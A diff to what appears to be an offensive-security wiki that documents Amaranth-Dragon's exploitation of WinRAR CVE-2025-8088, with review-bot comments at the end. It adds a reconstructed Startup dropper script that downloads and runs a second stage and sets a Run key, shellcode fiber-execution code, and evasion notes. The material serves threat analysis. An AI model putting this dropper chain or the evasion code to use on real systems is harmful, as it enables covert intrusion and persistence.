diff --git a/src/generic-hacking/archive-extraction-path-traversal.md b/src/generic-hacking/archive-extraction-path-traversal.md index f371bcd3c25..beda9fd7e52 100644 --- a/src/generic-hacking/archive-extraction-path-traversal.md +++ b/src/generic-hacking/archive-extraction-path-traversal.md @@ -42,6 +42,14 @@ Options used: Deliver `evil.rar` to the victim and instruct them to extract it with a vulnerable WinRAR build. +### Weaponised Startup persistence (Amaranth-Dragon) + +* Spearphish RAR lures weaponised CVE-2025-8088 to **iterate multiple traversal depths** until the payload lands in the correct Startup folder regardless of where the victim extracts the archive. +* The dropped file is a **`.cmd`/`.bat`** that runs at next logon and typically: + * Downloads a password-protected second-stage RAR from a trusted domain (e.g., Dropbox/actor CDN). + * Extracts a **signed EXE + malicious DLL** pair into `C:\Users\Public\Documents\\`, then sets a **HKCU Run** value and executes the EXE to sideload the DLL. +* Sandboxes that only unpack the outer archive may **miss the Startup-written script entirely**, so archive statics can appear benign while the persistent script is absent from the analysis artifacts. + ### Observed Exploitation in the Wild ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached RAR archives abusing CVE-2025-8088 to deploy customised backdoors and facilitate ransomware operations. 
@@ -97,5 +105,6 @@ ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached - [Trend Micro ZDI-25-949 – 7-Zip symlink ZIP traversal (CVE-2025-11001)](https://www.zerodayinitiative.com/advisories/ZDI-25-949/) - [JFrog Research – mholt/archiver Zip-Slip (CVE-2025-3445)](https://research.jfrog.com/vulnerabilities/archiver-zip-slip/) +- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/) {{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md index 27bbfb3071a..27d8d20981c 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md 
@@ -491,6 +491,28 @@ Tradecraft notes: * Because the executable stays trusted, most allowlisting controls only need your malicious DLL to sit alongside it. Focus on customizing the loader DLL; the signed parent can typically run untouched. * ShadowPad’s decryptor expects the TMP blob to live next to the loader and be writable so it can zero the file after mapping. Keep the directory writable until the payload loads; once in memory the TMP file can safely be deleted for OPSEC. +## Amaranth Loader / TGAmaranth sideloading pattern + +* Delivery: password-protected RAR/ZIP drops a **signed EXE + malicious DLL** together; the EXE looks for a dependency name (`DllSafeCheck64.dll`, `libcef.dll`, etc.) and executes attacker code from the same folder. +* Exports: only **one export contains logic**; all other exports point to a stub that immediately `Sleep(INFINITE)` to confuse static/automated triage. +* Decryption chain: strings/URLs are XOR-decoded at runtime, then the loader fetches an **AES key from a first URL (Pastebin or actor infra, often geo-fenced)** and an **encrypted payload from a second URL**, decrypts with **AES-CBC** using a constant IV `12 34 56 78 90 AB CD EF 34 56 78 90 AB CD EF 12`, allocates `PAGE_EXECUTE_READWRITE`, and runs the shellcode (commonly Havoc). +* Variants swap Pastebin for Cloudflare-fronted hosts that reply `403` to non-target IPs, and rotate benign-looking **User-Agents** when calling `InternetOpenA`. 
+* A later variant decrypts a local shellcode blob with a **non-standard RC4 PRGA** (output byte = `(s[i]+s[j])&0xff` instead of `box[box[i]+box[j]]`), then executes inside a **fiber context** to alter the call stack: + ```python + def prga(box): + j=0 + for i in range(len(data)): + ii=(i+1)&0xff; j=(j+box[ii])&0xff + box[ii], box[j] = box[j], box[ii] + yield (box[ii]+box[j]) & 0xff + ``` + ```c + ConvertThreadToFiber(NULL); + LPVOID f = CreateFiber(0, shellcode, NULL); + SwitchToFiber(f); + ``` +* The TGAmaranth RAT (sideloaded by the same pattern) decrypts a Telegram bot token with the XOR routine, performs **self-debugging via `DebugActiveProcess`** to detect analysts, and **unhooks `ntdll.dll`** by copying a clean `.text` section from a suspended `cmd.exe` into its own process before running commands. + ## References - [CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe](https://trustedsec.com/blog/cve-2025-1729-privilege-escalation-using-tpqmassistant-exe) @@ -503,6 +525,7 @@ Tradecraft notes: - [Sysinternals Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon) - [Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/) - [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/) +- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/) -{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md index 4d769d374e9..55cfd717f5f 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md +++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md @@ -48,6 +48,20 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup" ../../generic-hacking/archive-extraction-path-traversal.md {{#endref}} +### Startup dropper chain example (CVE-2025-8088) + +A practical abuse seen in 2025 campaigns: + +```cmd +# dropped .cmd inside Startup via path traversal +powershell -w hidden (New-Object Net.WebClient).DownloadFile(`RAR_URL`, %TEMP%\u.rar) +rar.exe x -hp`pass` %TEMP%\u.rar C:\Users\Public\Documents\Microsoft\winupdate_v%RANDOM%%TIME:~3,2%\ +reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v `rand` /d `exe_path` +start "" `exe_path` # signed host sideloads malicious DLL +``` + +Even if the victim only unpacks the archive, the auto-started script will fetch the second stage on reboot/logon, install a Run key, and execute the signed binary that sideloads the attacker DLL. + ## Registry 
@@ -346,6 +360,7 @@ autorunsc.exe -m -nobanner -a * -ct /accepteula - [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/) - [https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2) - [https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell](https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell) +- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/)
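Review bot: in the `archive-extraction-path-traversal.md` hunk (`@@ -42,6 +42,14 @@`), the drop path in the fourth bullet, `C:\Users\Public\Documents\\`, carries a doubled trailing backslash that reads like a markdown-escape artifact rather than the real path; either render it as `C:\Users\Public\Documents\` or, if the subfolder name is unknown or randomised, mark it with a placeholder such as `C:\Users\Public\Documents\<subdir>\`. The final bullet on sandboxes would also be more useful to defenders if it stated the check that follows from it: unpack the archive to every traversal depth the sample iterates and diff the user's Startup folder before and after extraction, since a benign-looking outer archive is exactly the symptom the bullet describes.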
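Review bot: in the `dll-hijacking/README.md` hunk (`@@ -491,6 +491,28 @@`), the Python `prga(box)` snippet references `data` inside `range(len(data))` but never defines or receives it, so it does not run as written; pass the length in (`def prga(box, n):` with `for i in range(n):`) or loop indefinitely and let the caller `zip` it against the ciphertext. The surrounding bullet also describes the standard output as `box[box[i]+box[j]]`, which omits the `& 0xff` wrap that standard RC4 applies to the index; writing it as `box[(box[i]+box[j]) & 0xff]` makes the contrast with the variant's `(box[i]+box[j]) & 0xff` exact. Since the bullet says only the PRGA is non-standard, a one-line note that the KSA is the usual RC4 key schedule would let an analyst reproduce the decryptor from the page alone.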
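Review bot: in the `privilege-escalation-with-autorun-binaries.md` hunk (`@@ -48,6 +48,20 @@`), the fenced `cmd` block opens with a `#` comment line, which is not batch comment syntax (`rem` or `::` are), and uses backticks around `RAR_URL`, `pass`, `rand` and `exe_path`, which have no quoting meaning in cmd; since the block is a reconstruction of the dropped script rather than a verbatim sample, mark the substituted values consistently as placeholders (for example `<RAR_URL>`) and keep the annotation in batch comment form so readers can tell what is illustrative. The lead sentence says "seen in 2025 campaigns" while the Check Point reference added in the `@@ -346,6 +360,7 @@` hunk of the same file carries `2026` in its URL path; verify the campaign date and align the two.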